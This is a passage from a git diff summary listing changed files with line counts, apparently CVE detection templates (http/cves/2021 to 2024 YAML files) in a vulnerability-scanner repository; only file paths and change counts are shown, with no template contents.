++++-- http/cves/2021/CVE-2021-41282.yaml | 6 +-- http/cves/2021/CVE-2021-41349.yaml | 10 +++- http/cves/2021/CVE-2021-41381.yaml | 5 +- http/cves/2021/CVE-2021-41432.yaml | 9 +++- http/cves/2021/CVE-2021-41460.yaml | 4 +- http/cves/2021/CVE-2021-41648.yaml | 4 +- http/cves/2021/CVE-2021-41653.yaml | 5 +- http/cves/2021/CVE-2021-41749.yaml | 5 +- http/cves/2021/CVE-2021-41773.yaml | 5 +- http/cves/2021/CVE-2021-4191.yaml | 4 +- http/cves/2021/CVE-2021-42013.yaml | 8 ++-- http/cves/2021/CVE-2021-42063.yaml | 8 ++-- http/cves/2021/CVE-2021-42192.yaml | 4 +- http/cves/2021/CVE-2021-42237.yaml | 4 +- http/cves/2021/CVE-2021-42551.yaml | 5 +- http/cves/2021/CVE-2021-42567.yaml | 4 +- http/cves/2021/CVE-2021-42627.yaml | 4 +- http/cves/2021/CVE-2021-42663.yaml | 3 +- http/cves/2021/CVE-2021-42887.yaml | 4 +- http/cves/2021/CVE-2021-43062.yaml | 4 +- http/cves/2021/CVE-2021-43287.yaml | 9 +++- http/cves/2021/CVE-2021-43574.yaml | 9 +++- http/cves/2021/CVE-2021-43725.yaml | 4 +- http/cves/2021/CVE-2021-43734.yaml | 8 +++- http/cves/2021/CVE-2021-43798.yaml | 9 +++- http/cves/2021/CVE-2021-44138.yaml | 5 +- http/cves/2021/CVE-2021-44139.yaml | 8 ++-- http/cves/2021/CVE-2021-44152.yaml | 9 +++- http/cves/2021/CVE-2021-44451.yaml | 8 +++- http/cves/2021/CVE-2021-44515.yaml | 4 +- http/cves/2021/CVE-2021-44528.yaml | 5 +- http/cves/2021/CVE-2021-44529.yaml | 4 +- http/cves/2021/CVE-2021-45043.yaml | 4 +- http/cves/2021/CVE-2021-45380.yaml | 4 +- http/cves/2021/CVE-2021-45422.yaml | 9 +++- http/cves/2021/CVE-2021-46073.yaml | 4 +- http/cves/2021/CVE-2021-46107.yaml | 8 +++- http/cves/2021/CVE-2021-46387.yaml | 4 +- http/cves/2021/CVE-2021-46417.yaml | 4 +- http/cves/2021/CVE-2021-46418.yaml | 6 +-- http/cves/2021/CVE-2021-46419.yaml | 15 ++++-- http/cves/2021/CVE-2021-46424.yaml | 4 +- http/cves/2021/CVE-2021-46704.yaml | 8 +++- http/cves/2022/CVE-2022-0169.yaml | 2 +- http/cves/2022/CVE-2022-0201.yaml | 2 +- http/cves/2022/CVE-2022-0220.yaml | 4 +- http/cves/2022/CVE-2022-0228.yaml | 2 +- http/cves/2022/CVE-2022-0271.yaml | 2 +- http/cves/2022/CVE-2022-0281.yaml | 12 +++-- http/cves/2022/CVE-2022-0342.yaml | 4 +- http/cves/2022/CVE-2022-0378.yaml | 8 +++- http/cves/2022/CVE-2022-0381.yaml | 7 ++- http/cves/2022/CVE-2022-0415.yaml | 6 ++- http/cves/2022/CVE-2022-0424.yaml | 8 ++-- http/cves/2022/CVE-2022-0533.yaml | 2 +- http/cves/2022/CVE-2022-0540.yaml | 8 ++-- http/cves/2022/CVE-2022-0591.yaml | 5 +- http/cves/2022/CVE-2022-0597.yaml | 8 +++- http/cves/2022/CVE-2022-0651.yaml | 4 +- http/cves/2022/CVE-2022-0660.yaml | 12 +++-- http/cves/2022/CVE-2022-0666.yaml | 9 +++- http/cves/2022/CVE-2022-0678.yaml | 8 +++- http/cves/2022/CVE-2022-0735.yaml | 5 +- http/cves/2022/CVE-2022-0785.yaml | 4 +- http/cves/2022/CVE-2022-0814.yaml | 2 +- http/cves/2022/CVE-2022-0870.yaml | 10 ++-- http/cves/2022/CVE-2022-0885.yaml | 5 +- http/cves/2022/CVE-2022-0928.yaml | 8 +++- http/cves/2022/CVE-2022-0954.yaml | 8 +++- http/cves/2022/CVE-2022-0963.yaml | 8 +++- http/cves/2022/CVE-2022-0968.yaml | 10 ++-- http/cves/2022/CVE-2022-1040.yaml | 4 +- http/cves/2022/CVE-2022-1058.yaml | 10 +++- http/cves/2022/CVE-2022-1162.yaml | 5 +- http/cves/2022/CVE-2022-1170.yaml | 2 +- http/cves/2022/CVE-2022-1386.yaml | 2 +- http/cves/2022/CVE-2022-1388.yaml | 4 +- http/cves/2022/CVE-2022-1439.yaml | 8 +++- http/cves/2022/CVE-2022-1580.yaml | 8 ++-- http/cves/2022/CVE-2022-1595.yaml | 6 +-- http/cves/2022/CVE-2022-1609.yaml | 2 +- http/cves/2022/CVE-2022-1713.yaml | 4 +- http/cves/2022/CVE-2022-1724.yaml | 7 ++- http/cves/2022/CVE-2022-1756.yaml | 4 +- http/cves/2022/CVE-2022-1815.yaml | 4 +- http/cves/2022/CVE-2022-1883.yaml | 4 +- http/cves/2022/CVE-2022-1906.yaml | 2 +- http/cves/2022/CVE-2022-1910.yaml | 4 +- http/cves/2022/CVE-2022-1952.yaml | 5 +- http/cves/2022/CVE-2022-21371.yaml | 4 +- http/cves/2022/CVE-2022-21500.yaml | 8 ++-- http/cves/2022/CVE-2022-21661.yaml | 4 +- http/cves/2022/CVE-2022-2174.yaml | 8 +++- http/cves/2022/CVE-2022-2185.yaml | 5 +- http/cves/2022/CVE-2022-22242.yaml | 4 +- http/cves/2022/CVE-2022-22897.yaml | 8 ++-- http/cves/2022/CVE-2022-2290.yaml | 6 ++- http/cves/2022/CVE-2022-22954.yaml | 4 +- http/cves/2022/CVE-2022-22972.yaml | 5 +- http/cves/2022/CVE-2022-23102.yaml | 4 +- http/cves/2022/CVE-2022-23131.yaml | 11 ++++- http/cves/2022/CVE-2022-23134.yaml | 10 +++- http/cves/2022/CVE-2022-2314.yaml | 4 +- http/cves/2022/CVE-2022-23347.yaml | 4 +- http/cves/2022/CVE-2022-23544.yaml | 9 +++- http/cves/2022/CVE-2022-23779.yaml | 5 +- http/cves/2022/CVE-2022-2379.yaml | 6 ++- http/cves/2022/CVE-2022-23808.yaml | 9 +++- http/cves/2022/CVE-2022-2383.yaml | 4 +- http/cves/2022/CVE-2022-23854.yaml | 4 +- http/cves/2022/CVE-2022-23898.yaml | 4 +- http/cves/2022/CVE-2022-24112.yaml | 8 +++- http/cves/2022/CVE-2022-24124.yaml | 4 +- http/cves/2022/CVE-2022-2414.yaml | 9 +++- http/cves/2022/CVE-2022-24260.yaml | 4 +- http/cves/2022/CVE-2022-24288.yaml | 15 ++++-- http/cves/2022/CVE-2022-2462.yaml | 6 +-- http/cves/2022/CVE-2022-24627.yaml | 8 ++-- http/cves/2022/CVE-2022-24681.yaml | 12 +++-- http/cves/2022/CVE-2022-24716.yaml | 13 ++++-- http/cves/2022/CVE-2022-24816.yaml | 4 +- http/cves/2022/CVE-2022-2487.yaml | 4 +- http/cves/2022/CVE-2022-2488.yaml | 4 +- http/cves/2022/CVE-2022-24899.yaml | 10 +++- http/cves/2022/CVE-2022-24990.yaml | 4 +- http/cves/2022/CVE-2022-25125.yaml | 4 +- http/cves/2022/CVE-2022-25148.yaml | 4 +- http/cves/2022/CVE-2022-25149.yaml | 4 +- http/cves/2022/CVE-2022-2535.yaml | 2 +- http/cves/2022/CVE-2022-25356.yaml | 4 +- http/cves/2022/CVE-2022-25481.yaml | 9 +++- http/cves/2022/CVE-2022-25486.yaml | 5 +- http/cves/2022/CVE-2022-2551.yaml | 4 +- http/cves/2022/CVE-2022-25568.yaml | 4 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 4 +- http/cves/2022/CVE-2022-26138.yaml | 4 +- http/cves/2022/CVE-2022-26148.yaml | 10 +++- http/cves/2022/CVE-2022-26159.yaml | 4 +- http/cves/2022/CVE-2022-26263.yaml | 6 ++- http/cves/2022/CVE-2022-2627.yaml | 4 +- http/cves/2022/CVE-2022-2633.yaml | 4 +- http/cves/2022/CVE-2022-26564.yaml | 8 +++- http/cves/2022/CVE-2022-2733.yaml | 12 ++++- http/cves/2022/CVE-2022-2756.yaml | 4 +- http/cves/2022/CVE-2022-27593.yaml | 14 ++++-- http/cves/2022/CVE-2022-27926.yaml | 9 +++- http/cves/2022/CVE-2022-27927.yaml | 4 +- http/cves/2022/CVE-2022-27984.yaml | 4 +- http/cves/2022/CVE-2022-28219.yaml | 4 +- http/cves/2022/CVE-2022-28290.yaml | 2 +- http/cves/2022/CVE-2022-28363.yaml | 8 +++- http/cves/2022/CVE-2022-28365.yaml | 8 +++- http/cves/2022/CVE-2022-28923.yaml | 4 +- http/cves/2022/CVE-2022-28955.yaml | 4 +- http/cves/2022/CVE-2022-29153.yaml | 7 ++- http/cves/2022/CVE-2022-29272.yaml | 4 +- http/cves/2022/CVE-2022-29298.yaml | 4 +- http/cves/2022/CVE-2022-29299.yaml | 2 +- http/cves/2022/CVE-2022-29303.yaml | 8 ++-- http/cves/2022/CVE-2022-29349.yaml | 8 +++- http/cves/2022/CVE-2022-29548.yaml | 2 +- http/cves/2022/CVE-2022-29775.yaml | 4 +- http/cves/2022/CVE-2022-30489.yaml | 9 +++- http/cves/2022/CVE-2022-30514.yaml | 4 +- http/cves/2022/CVE-2022-30525.yaml | 4 +- http/cves/2022/CVE-2022-30776.yaml | 8 +++- http/cves/2022/CVE-2022-30777.yaml | 13 ++++-- http/cves/2022/CVE-2022-31126.yaml | 4 +- http/cves/2022/CVE-2022-31268.yaml | 9 +++- http/cves/2022/CVE-2022-31269.yaml | 13 ++++-- http/cves/2022/CVE-2022-31373.yaml | 4 +- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31499.yaml | 13 ++++-- http/cves/2022/CVE-2022-31656.yaml | 4 +- http/cves/2022/CVE-2022-31798.yaml | 13 ++++-- http/cves/2022/CVE-2022-31845.yaml | 9 +++- http/cves/2022/CVE-2022-31846.yaml | 11 +++-- http/cves/2022/CVE-2022-31847.yaml | 4 +- http/cves/2022/CVE-2022-32022.yaml | 4 +- http/cves/2022/CVE-2022-32024.yaml | 6 ++- http/cves/2022/CVE-2022-32025.yaml | 10 ++-- http/cves/2022/CVE-2022-32026.yaml | 6 ++- http/cves/2022/CVE-2022-32028.yaml | 10 ++-- http/cves/2022/CVE-2022-32094.yaml | 4 +- http/cves/2022/CVE-2022-32195.yaml | 6 ++- http/cves/2022/CVE-2022-3242.yaml | 8 +++- http/cves/2022/CVE-2022-32430.yaml | 4 +- http/cves/2022/CVE-2022-32770.yaml | 4 +- http/cves/2022/CVE-2022-32771.yaml | 4 +- http/cves/2022/CVE-2022-32772.yaml | 4 +- http/cves/2022/CVE-2022-33119.yaml | 4 +- http/cves/2022/CVE-2022-33174.yaml | 8 ++-- http/cves/2022/CVE-2022-33891.yaml | 9 +++- http/cves/2022/CVE-2022-33965.yaml | 4 +- http/cves/2022/CVE-2022-34045.yaml | 9 +++- http/cves/2022/CVE-2022-34046.yaml | 9 +++- http/cves/2022/CVE-2022-34047.yaml | 9 +++- http/cves/2022/CVE-2022-34048.yaml | 9 +++- http/cves/2022/CVE-2022-34049.yaml | 13 ++++-- http/cves/2022/CVE-2022-34328.yaml | 11 +++-- http/cves/2022/CVE-2022-34534.yaml | 4 +- http/cves/2022/CVE-2022-34576.yaml | 9 +++- http/cves/2022/CVE-2022-34590.yaml | 4 +- http/cves/2022/CVE-2022-34753.yaml | 4 +- http/cves/2022/CVE-2022-3506.yaml | 5 +- http/cves/2022/CVE-2022-35151.yaml | 12 +++-- http/cves/2022/CVE-2022-35405.yaml | 4 +- http/cves/2022/CVE-2022-35413.yaml | 4 +- http/cves/2022/CVE-2022-35493.yaml | 4 +- http/cves/2022/CVE-2022-35653.yaml | 5 +- http/cves/2022/CVE-2022-35914.yaml | 8 +++- http/cves/2022/CVE-2022-36446.yaml | 4 +- http/cves/2022/CVE-2022-36537.yaml | 4 +- http/cves/2022/CVE-2022-36553.yaml | 4 +- http/cves/2022/CVE-2022-36642.yaml | 4 +- http/cves/2022/CVE-2022-36883.yaml | 4 +- http/cves/2022/CVE-2022-37042.yaml | 13 ++++-- http/cves/2022/CVE-2022-37153.yaml | 4 +- http/cves/2022/CVE-2022-37191.yaml | 4 +- http/cves/2022/CVE-2022-3800.yaml | 7 +-- http/cves/2022/CVE-2022-38131.yaml | 8 +++- http/cves/2022/CVE-2022-38295.yaml | 4 +- http/cves/2022/CVE-2022-38296.yaml | 5 +- http/cves/2022/CVE-2022-38463.yaml | 11 +++-- http/cves/2022/CVE-2022-38467.yaml | 2 +- http/cves/2022/CVE-2022-38553.yaml | 4 +- http/cves/2022/CVE-2022-38637.yaml | 8 ++-- http/cves/2022/CVE-2022-38817.yaml | 4 +- http/cves/2022/CVE-2022-38870.yaml | 4 +- http/cves/2022/CVE-2022-39048.yaml | 9 +++- http/cves/2022/CVE-2022-39195.yaml | 4 +- http/cves/2022/CVE-2022-3980.yaml | 9 +++- http/cves/2022/CVE-2022-39952.yaml | 4 +- http/cves/2022/CVE-2022-39960.yaml | 4 +- http/cves/2022/CVE-2022-40047.yaml | 8 +++- http/cves/2022/CVE-2022-40127.yaml | 15 ++++-- http/cves/2022/CVE-2022-4049.yaml | 6 +-- http/cves/2022/CVE-2022-4057.yaml | 2 +- http/cves/2022/CVE-2022-4059.yaml | 2 +- http/cves/2022/CVE-2022-40734.yaml | 4 +- http/cves/2022/CVE-2022-40879.yaml | 8 +++- http/cves/2022/CVE-2022-40881.yaml | 4 +- http/cves/2022/CVE-2022-41412.yaml | 4 +- http/cves/2022/CVE-2022-41441.yaml | 4 +- http/cves/2022/CVE-2022-41473.yaml | 4 +- http/cves/2022/CVE-2022-42094.yaml | 4 +- http/cves/2022/CVE-2022-42233.yaml | 13 ++++-- http/cves/2022/CVE-2022-42746.yaml | 8 ++-- http/cves/2022/CVE-2022-42747.yaml | 4 +- http/cves/2022/CVE-2022-42748.yaml | 4 +- http/cves/2022/CVE-2022-42749.yaml | 8 ++-- http/cves/2022/CVE-2022-4295.yaml | 2 +- http/cves/2022/CVE-2022-43014.yaml | 4 +- http/cves/2022/CVE-2022-43015.yaml | 4 +- http/cves/2022/CVE-2022-43016.yaml | 4 +- http/cves/2022/CVE-2022-43017.yaml | 4 +- http/cves/2022/CVE-2022-43018.yaml | 4 +- http/cves/2022/CVE-2022-4305.yaml | 2 +- http/cves/2022/CVE-2022-43140.yaml | 13 ++++-- http/cves/2022/CVE-2022-43165.yaml | 4 +- http/cves/2022/CVE-2022-43166.yaml | 4 +- http/cves/2022/CVE-2022-4321.yaml | 2 +- http/cves/2022/CVE-2022-43769.yaml | 4 +- http/cves/2022/CVE-2022-44877.yaml | 4 +- http/cves/2022/CVE-2022-44944.yaml | 2 +- http/cves/2022/CVE-2022-44946.yaml | 2 +- http/cves/2022/CVE-2022-44950.yaml | 2 +- http/cves/2022/CVE-2022-45354.yaml | 6 ++- http/cves/2022/CVE-2022-45365.yaml | 4 +- http/cves/2022/CVE-2022-45835.yaml | 2 +- http/cves/2022/CVE-2022-45917.yaml | 4 +- http/cves/2022/CVE-2022-45933.yaml | 9 +++- http/cves/2022/CVE-2022-46071.yaml | 2 +- http/cves/2022/CVE-2022-46169.yaml | 15 ++++-- http/cves/2022/CVE-2022-46381.yaml | 4 +- http/cves/2022/CVE-2022-46443.yaml | 2 +- http/cves/2022/CVE-2022-46888.yaml | 4 +- http/cves/2022/CVE-2022-46934.yaml | 8 +++- http/cves/2022/CVE-2022-47002.yaml | 4 +- http/cves/2022/CVE-2022-47003.yaml | 4 +- http/cves/2022/CVE-2022-47501.yaml | 14 ++++-- http/cves/2022/CVE-2022-47615.yaml | 2 +- http/cves/2022/CVE-2022-47945.yaml | 9 +++- http/cves/2022/CVE-2022-47966.yaml | 4 +- http/cves/2022/CVE-2022-47986.yaml | 6 ++- http/cves/2022/CVE-2022-48012.yaml | 4 +- http/cves/2022/CVE-2022-48197.yaml | 4 +- http/cves/2023/CVE-2023-0159.yaml | 9 ++-- http/cves/2023/CVE-2023-0297.yaml | 19 ++++++-- http/cves/2023/CVE-2023-0669.yaml | 9 +++- http/cves/2023/CVE-2023-0678.yaml | 7 ++- http/cves/2023/CVE-2023-0777.yaml | 10 +++- http/cves/2023/CVE-2023-0947.yaml | 8 +++- http/cves/2023/CVE-2023-1177.yaml | 4 +- http/cves/2023/CVE-2023-1496.yaml | 4 +- http/cves/2023/CVE-2023-1671.yaml | 10 +++- http/cves/2023/CVE-2023-1698.yaml | 4 +- http/cves/2023/CVE-2023-1719.yaml | 4 +- http/cves/2023/CVE-2023-1835.yaml | 4 +- http/cves/2023/CVE-2023-1892.yaml | 4 +- http/cves/2023/CVE-2023-20073.yaml | 4 +- http/cves/2023/CVE-2023-2059.yaml | 9 +++- http/cves/2023/CVE-2023-20864.yaml | 4 +- http/cves/2023/CVE-2023-20887.yaml | 14 ++++-- http/cves/2023/CVE-2023-20888.yaml | 13 ++++-- http/cves/2023/CVE-2023-20889.yaml | 13 ++++-- http/cves/2023/CVE-2023-22232.yaml | 4 +- http/cves/2023/CVE-2023-2227.yaml | 10 +++- http/cves/2023/CVE-2023-22463.yaml | 8 +++- http/cves/2023/CVE-2023-22478.yaml | 8 +++- http/cves/2023/CVE-2023-22480.yaml | 9 +++- http/cves/2023/CVE-2023-22515.yaml | 4 +- http/cves/2023/CVE-2023-22518.yaml | 4 +- http/cves/2023/CVE-2023-2252.yaml | 2 +- http/cves/2023/CVE-2023-22527.yaml | 6 ++- http/cves/2023/CVE-2023-22620.yaml | 4 +- http/cves/2023/CVE-2023-22897.yaml | 4 +- http/cves/2023/CVE-2023-23161.yaml | 6 ++- http/cves/2023/CVE-2023-23333.yaml | 12 ++++- http/cves/2023/CVE-2023-2356.yaml | 5 +- http/cves/2023/CVE-2023-23752.yaml | 6 ++- http/cves/2023/CVE-2023-24044.yaml | 10 +++- http/cves/2023/CVE-2023-24243.yaml | 4 +- http/cves/2023/CVE-2023-24322.yaml | 4 +- http/cves/2023/CVE-2023-24488.yaml | 4 +- http/cves/2023/CVE-2023-24489.yaml | 4 +- http/cves/2023/CVE-2023-24657.yaml | 4 +- http/cves/2023/CVE-2023-24733.yaml | 10 ++-- http/cves/2023/CVE-2023-24735.yaml | 10 ++-- http/cves/2023/CVE-2023-24737.yaml | 10 ++-- http/cves/2023/CVE-2023-25135.yaml | 16 +++++-- http/cves/2023/CVE-2023-25157.yaml | 8 +++- http/cves/2023/CVE-2023-25194.yaml | 4 +- http/cves/2023/CVE-2023-25573.yaml | 5 +- http/cves/2023/CVE-2023-25717.yaml | 4 +- http/cves/2023/CVE-2023-26035.yaml | 4 +- http/cves/2023/CVE-2023-26067.yaml | 4 +- http/cves/2023/CVE-2023-26255.yaml | 4 +- http/cves/2023/CVE-2023-26256.yaml | 4 +- http/cves/2023/CVE-2023-26347.yaml | 11 ++++- http/cves/2023/CVE-2023-26360.yaml | 14 ++++-- http/cves/2023/CVE-2023-2648.yaml | 8 ++-- http/cves/2023/CVE-2023-27008.yaml | 4 +- http/cves/2023/CVE-2023-27032.yaml | 8 ++-- http/cves/2023/CVE-2023-27159.yaml | 9 +++- http/cves/2023/CVE-2023-27292.yaml | 4 +- http/cves/2023/CVE-2023-2732.yaml | 3 ++ http/cves/2023/CVE-2023-27350.yaml | 10 +++- http/cves/2023/CVE-2023-27372.yaml | 5 +- http/cves/2023/CVE-2023-27482.yaml | 5 +- http/cves/2023/CVE-2023-27524.yaml | 9 +++- http/cves/2023/CVE-2023-2766.yaml | 4 +- http/cves/2023/CVE-2023-2780.yaml | 4 +- http/cves/2023/CVE-2023-2796.yaml | 14 ++++-- http/cves/2023/CVE-2023-2822.yaml | 4 +- http/cves/2023/CVE-2023-2825.yaml | 5 +- http/cves/2023/CVE-2023-28343.yaml | 8 +++- http/cves/2023/CVE-2023-28432.yaml | 16 +++++-- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-29298.yaml | 11 ++++- http/cves/2023/CVE-2023-29300.yaml | 11 ++++- http/cves/2023/CVE-2023-29357.yaml | 8 +++- http/cves/2023/CVE-2023-2948.yaml | 12 ++++- http/cves/2023/CVE-2023-29489.yaml | 20 +++++--- http/cves/2023/CVE-2023-2949.yaml | 12 ++++- http/cves/2023/CVE-2023-29827.yaml | 2 +- http/cves/2023/CVE-2023-29919.yaml | 4 +- http/cves/2023/CVE-2023-29922.yaml | 9 +++- http/cves/2023/CVE-2023-29923.yaml | 5 +- http/cves/2023/CVE-2023-30019.yaml | 4 +- http/cves/2023/CVE-2023-30150.yaml | 4 +- http/cves/2023/CVE-2023-30534.yaml | 15 ++++-- http/cves/2023/CVE-2023-3077.yaml | 4 +- http/cves/2023/CVE-2023-30943.yaml | 5 +- http/cves/2023/CVE-2023-31059.yaml | 8 +++- http/cves/2023/CVE-2023-31446.yaml | 6 ++- http/cves/2023/CVE-2023-32077.yaml | 6 ++- http/cves/2023/CVE-2023-3219.yaml | 13 ++++-- http/cves/2023/CVE-2023-32235.yaml | 4 +- http/cves/2023/CVE-2023-32315.yaml | 13 ++++-- http/cves/2023/CVE-2023-33629.yaml | 4 +- http/cves/2023/CVE-2023-3368.yaml | 5 +- http/cves/2023/CVE-2023-33831.yaml | 4 +- http/cves/2023/CVE-2023-34192.yaml | 10 +++- http/cves/2023/CVE-2023-34537.yaml | 8 +++- http/cves/2023/CVE-2023-34598.yaml | 4 +- http/cves/2023/CVE-2023-34599.yaml | 4 +- http/cves/2023/CVE-2023-34751.yaml | 4 +- http/cves/2023/CVE-2023-34752.yaml | 4 +- http/cves/2023/CVE-2023-34753.yaml | 4 +- http/cves/2023/CVE-2023-34755.yaml | 4 +- http/cves/2023/CVE-2023-34756.yaml | 4 +- http/cves/2023/CVE-2023-3479.yaml | 8 +++- http/cves/2023/CVE-2023-34843.yaml | 4 +- http/cves/2023/CVE-2023-34960.yaml | 5 +- http/cves/2023/CVE-2023-34993.yaml | 9 +++- http/cves/2023/CVE-2023-35078.yaml | 4 +- http/cves/2023/CVE-2023-35082.yaml | 4 +- http/cves/2023/CVE-2023-35158.yaml | 5 +- http/cves/2023/CVE-2023-35162.yaml | 12 +++-- http/cves/2023/CVE-2023-35813.yaml | 4 +- http/cves/2023/CVE-2023-35844.yaml | 4 +- http/cves/2023/CVE-2023-35885.yaml | 9 +++- http/cves/2023/CVE-2023-36144.yaml | 4 +- http/cves/2023/CVE-2023-36284.yaml | 8 ++-- http/cves/2023/CVE-2023-36347.yaml | 1 + http/cves/2023/CVE-2023-36845.yaml | 4 +- http/cves/2023/CVE-2023-37265.yaml | 8 +++- http/cves/2023/CVE-2023-37266.yaml | 8 +++- http/cves/2023/CVE-2023-37270.yaml | 4 +- http/cves/2023/CVE-2023-37462.yaml | 5 +- http/cves/2023/CVE-2023-37580.yaml | 4 +- http/cves/2023/CVE-2023-3765.yaml | 4 +- http/cves/2023/CVE-2023-37679.yaml | 4 +- http/cves/2023/CVE-2023-37728.yaml | 8 +++- http/cves/2023/CVE-2023-38035.yaml | 4 +- http/cves/2023/CVE-2023-38203.yaml | 11 ++++- http/cves/2023/CVE-2023-38205.yaml | 11 ++++- http/cves/2023/CVE-2023-3836.yaml | 8 +++- http/cves/2023/CVE-2023-38433.yaml | 4 +- http/cves/2023/CVE-2023-3844.yaml | 2 +- http/cves/2023/CVE-2023-38501.yaml | 4 +- http/cves/2023/CVE-2023-38646.yaml | 9 +++- http/cves/2023/CVE-2023-38964.yaml | 4 +- http/cves/2023/CVE-2023-39002.yaml | 4 +- http/cves/2023/CVE-2023-39026.yaml | 6 ++- http/cves/2023/CVE-2023-39108.yaml | 4 +- http/cves/2023/CVE-2023-39109.yaml | 4 +- http/cves/2023/CVE-2023-39110.yaml | 4 +- http/cves/2023/CVE-2023-39141.yaml | 4 +- http/cves/2023/CVE-2023-39143.yaml | 10 +++- http/cves/2023/CVE-2023-39361.yaml | 15 ++++-- http/cves/2023/CVE-2023-39598.yaml | 4 +- http/cves/2023/CVE-2023-39600.yaml | 9 +++- http/cves/2023/CVE-2023-39676.yaml | 4 +- http/cves/2023/CVE-2023-39677.yaml | 4 +- http/cves/2023/CVE-2023-39700.yaml | 15 ++++-- http/cves/2023/CVE-2023-40779.yaml | 4 +- http/cves/2023/CVE-2023-4112.yaml | 4 +- http/cves/2023/CVE-2023-4116.yaml | 4 +- http/cves/2023/CVE-2023-41265.yaml | 12 ++++- http/cves/2023/CVE-2023-41266.yaml | 11 ++++- http/cves/2023/CVE-2023-4173.yaml | 5 +- http/cves/2023/CVE-2023-4174.yaml | 4 +- http/cves/2023/CVE-2023-41763.yaml | 6 ++- http/cves/2023/CVE-2023-41892.yaml | 9 +++- http/cves/2023/CVE-2023-42343.yaml | 9 +++- http/cves/2023/CVE-2023-42442.yaml | 4 +- http/cves/2023/CVE-2023-42793.yaml | 9 +++- http/cves/2023/CVE-2023-43208.yaml | 11 +++-- http/cves/2023/CVE-2023-43374.yaml | 12 +++-- http/cves/2023/CVE-2023-43795.yaml | 9 +++- http/cves/2023/CVE-2023-44352.yaml | 10 +++- http/cves/2023/CVE-2023-44353.yaml | 10 +++- http/cves/2023/CVE-2023-4451.yaml | 9 +++- http/cves/2023/CVE-2023-44812.yaml | 5 +- http/cves/2023/CVE-2023-44813.yaml | 4 +- http/cves/2023/CVE-2023-4521.yaml | 9 ++-- http/cves/2023/CVE-2023-45375.yaml | 6 +-- http/cves/2023/CVE-2023-4542.yaml | 4 +- http/cves/2023/CVE-2023-45671.yaml | 4 +- http/cves/2023/CVE-2023-4568.yaml | 10 +++- http/cves/2023/CVE-2023-45852.yaml | 8 +++- http/cves/2023/CVE-2023-45855.yaml | 5 +- http/cves/2023/CVE-2023-4596.yaml | 4 +- http/cves/2023/CVE-2023-46347.yaml | 2 +- http/cves/2023/CVE-2023-46359.yaml | 2 +- http/cves/2023/CVE-2023-46574.yaml | 4 +- http/cves/2023/CVE-2023-46747.yaml | 4 +- http/cves/2023/CVE-2023-47211.yaml | 6 ++- http/cves/2023/CVE-2023-47246.yaml | 4 +- http/cves/2023/CVE-2023-47643.yaml | 6 ++- http/cves/2023/CVE-2023-48023.yaml | 12 +++-- http/cves/2023/CVE-2023-48084.yaml | 7 ++- http/cves/2023/CVE-2023-48777.yaml | 9 +++- http/cves/2023/CVE-2023-49070.yaml | 10 +++- http/cves/2023/CVE-2023-49103.yaml | 4 +- http/cves/2023/CVE-2023-4966.yaml | 4 +- http/cves/2023/CVE-2023-4973.yaml | 8 +++- http/cves/2023/CVE-2023-4974.yaml | 4 +- http/cves/2023/CVE-2023-5003.yaml | 2 +- http/cves/2023/CVE-2023-50290.yaml | 14 ++++-- http/cves/2023/CVE-2023-5074.yaml | 4 +- http/cves/2023/CVE-2023-5089.yaml | 2 +- http/cves/2023/CVE-2023-50917.yaml | 7 ++- http/cves/2023/CVE-2023-50968.yaml | 10 +++- http/cves/2023/CVE-2023-51467.yaml | 10 +++- http/cves/2023/CVE-2023-52085.yaml | 8 +++- http/cves/2023/CVE-2023-5244.yaml | 8 +++- http/cves/2023/CVE-2023-5830.yaml | 6 ++- http/cves/2023/CVE-2023-5914.yaml | 6 ++- http/cves/2023/CVE-2023-5991.yaml | 2 +- http/cves/2023/CVE-2023-6018.yaml | 6 ++- http/cves/2023/CVE-2023-6020.yaml | 8 +++- http/cves/2023/CVE-2023-6021.yaml | 9 +++- http/cves/2023/CVE-2023-6023.yaml | 14 ++++-- http/cves/2023/CVE-2023-6038.yaml | 4 +- http/cves/2023/CVE-2023-6063.yaml | 13 +++--- http/cves/2023/CVE-2023-6065.yaml | 2 +- http/cves/2023/CVE-2023-6114.yaml | 2 +- http/cves/2023/CVE-2023-6360.yaml | 2 +- http/cves/2023/CVE-2023-6379.yaml | 6 ++- http/cves/2023/CVE-2023-6380.yaml | 7 ++- http/cves/2023/CVE-2023-6389.yaml | 2 +- http/cves/2023/CVE-2023-6553.yaml | 2 +- http/cves/2023/CVE-2023-6567.yaml | 2 +- http/cves/2023/CVE-2023-6623.yaml | 2 +- http/cves/2023/CVE-2023-6634.yaml | 2 +- http/cves/2023/CVE-2023-6831.yaml | 4 +- http/cves/2023/CVE-2023-6875.yaml | 2 +- http/cves/2023/CVE-2023-6909.yaml | 6 ++- http/cves/2023/CVE-2023-6977.yaml | 4 +- http/cves/2023/CVE-2023-6989.yaml | 2 +- http/cves/2023/CVE-2023-7028.yaml | 5 +- http/cves/2024/CVE-2024-0195.yaml | 10 ++-- http/cves/2024/CVE-2024-0200.yaml | 9 ++-- http/cves/2024/CVE-2024-0204.yaml | 20 +++++--- http/cves/2024/CVE-2024-0235.yaml | 19 ++++++-- http/cves/2024/CVE-2024-0305.yaml | 9 ++-- http/cves/2024/CVE-2024-0713.yaml | 2 +- http/cves/2024/CVE-2024-1021.yaml | 8 ++-- http/cves/2024/CVE-2024-1061.yaml | 2 +- http/cves/2024/CVE-2024-1071.yaml | 2 +- http/cves/2024/CVE-2024-1183.yaml | 4 +- http/cves/2024/CVE-2024-1208.yaml | 4 +- http/cves/2024/CVE-2024-1209.yaml | 4 +- http/cves/2024/CVE-2024-1212.yaml | 4 +- http/cves/2024/CVE-2024-1709.yaml | 13 ++++-- http/cves/2024/CVE-2024-21644.yaml | 19 ++++++-- http/cves/2024/CVE-2024-21645.yaml | 19 ++++++-- http/cves/2024/CVE-2024-21683.yaml | 3 +- http/cves/2024/CVE-2024-21887.yaml | 9 +++- http/cves/2024/CVE-2024-21893.yaml | 9 +++- http/cves/2024/CVE-2024-22024.yaml | 9 +++- http/cves/2024/CVE-2024-22319.yaml | 9 +++- http/cves/2024/CVE-2024-22320.yaml | 9 +++- http/cves/2024/CVE-2024-22927.yaml | 3 +- http/cves/2024/CVE-2024-23917.yaml | 16 ++++--- http/cves/2024/CVE-2024-24131.yaml | 4 +- http/cves/2024/CVE-2024-25669.yaml | 4 +- http/cves/2024/CVE-2024-25735.yaml 